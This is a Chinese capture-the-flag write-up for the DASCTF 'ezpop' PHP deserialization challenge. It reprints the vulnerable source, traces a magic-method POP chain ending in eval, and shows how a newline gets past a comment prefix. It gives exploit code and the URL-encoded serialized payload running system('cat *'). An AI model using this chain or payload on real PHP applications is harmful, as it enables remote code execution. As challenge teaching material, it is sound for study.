[DASCTF]ezpop-WP

moran

发表于 2022-03-27

更新于 2025-05-26

WriteUPs

贴上源码

<?php

class crow
{
    public $v1;
    public $v2;

    function eval() {
        echo new $this->v1($this->v2);
    }

    public function __invoke()
    {
        $this->v1->world();
    }
}

class fin
{
    public $f1;

    public function __destruct()
    {
        echo $this->f1 . '114514';
    }

    public function run()
    {
        ($this->f1)();
    }

    public function __call($a, $b)
    {
        echo $this->f1->get_flag();
    }

}

class what
{
    public $a;

    public function __toString()
    {
        $this->a->run();
        return 'hello';
    }
}
class mix
{
    public $m1;

    public function run()
    {
        ($this->m1)();
    }

    public function get_flag()
    {
        eval('#' . $this->m1);
    }

}

if (isset($_POST['cmd'])) {
    unserialize($_POST['cmd']);
} else {
    highlight_file(__FILE__);
}
?>

一道反序列化的题目，先审查一下代码，然后写pop链

fin类中__destruct析构，当类被销毁时自动执行，从这里开始。

__destruct方法下有echo输出字符串可以调用what类中的__tostring魔术方法，__tostring下的调用run()函数有两个类可用，我选择mix类。mix类中的run()函数($this->m1)();使用函数的方式调用变量，触发crow类的__invoke魔术方法，在__invoke魔术方法中调用不存在的world()函数，触发fin类中的__call魔术方法，然后调用mix类的get_flag()函数进行命令执行。

需要注意get_flag()函数中的eval('#' . $this->m1);含有#注释符，可用\n换行符绕过

exp如下

<?php

class crow
{
    public $v1;
    public $v2;

    function eval() {
        echo new $this->v1($this->v2);
    }

    public function __invoke()
    {
        $this->v1->world();
    }
}

class fin
{
    public $f1;

    public function __destruct()
    {
        echo $this->f1 . '114514';
    }

    public function run()
    {
        ($this->f1)();
    }

    public function __call($a, $b)
    {
        echo $this->f1->get_flag();
    }

}

class what
{
    public $a;

    public function __toString()
    {
        $this->a->run();
        return 'hello';
    }
}
class mix
{
    public $m1;

    public function run()
    {
        ($this->m1)();
    }

    public function get_flag()
    {
        eval('#' . $this->m1);
    }

}

$fin1=new fin();
$what=new what();
$mix1=new mix();
$mix2=new mix();
$crow=new crow();
$fin2=new fin();
$fin1->f1=$what;
$what->a=$mix1;
$mix1->m1=$crow;
$crow->v1=$fin2;
$fin2->f1=$mix2;
$mix2->m1="\nsystem('cat *');";

echo urlencode(serialize($fin1));

?>

得到

O%3A3%3A%22fin%22%3A1%3A%7Bs%3A2%3A%22f1%22%3BO%3A4%3A%22what%22%3A1%3A%7Bs%3A1%3A%22a%22%3BO%3A3%3A%22mix%22%3A1%3A%7Bs%3A2%3A%22m1%22%3BO%3A4%3A%22crow%22%3A2%3A%7Bs%3A2%3A%22v1%22%3BO%3A3%3A%22fin%22%3A1%3A%7Bs%3A2%3A%22f1%22%3BO%3A3%3A%22mix%22%3A1%3A%7Bs%3A2%3A%22m1%22%3Bs%3A17%3A%22%0Asystem%28%27cat+%2A%27%29%3B%22%3B%7D%7Ds%3A2%3A%22v2%22%3BN%3B%7D%7D%7D%7Dhello114514

使用BP发包，可以得到flag

推荐文章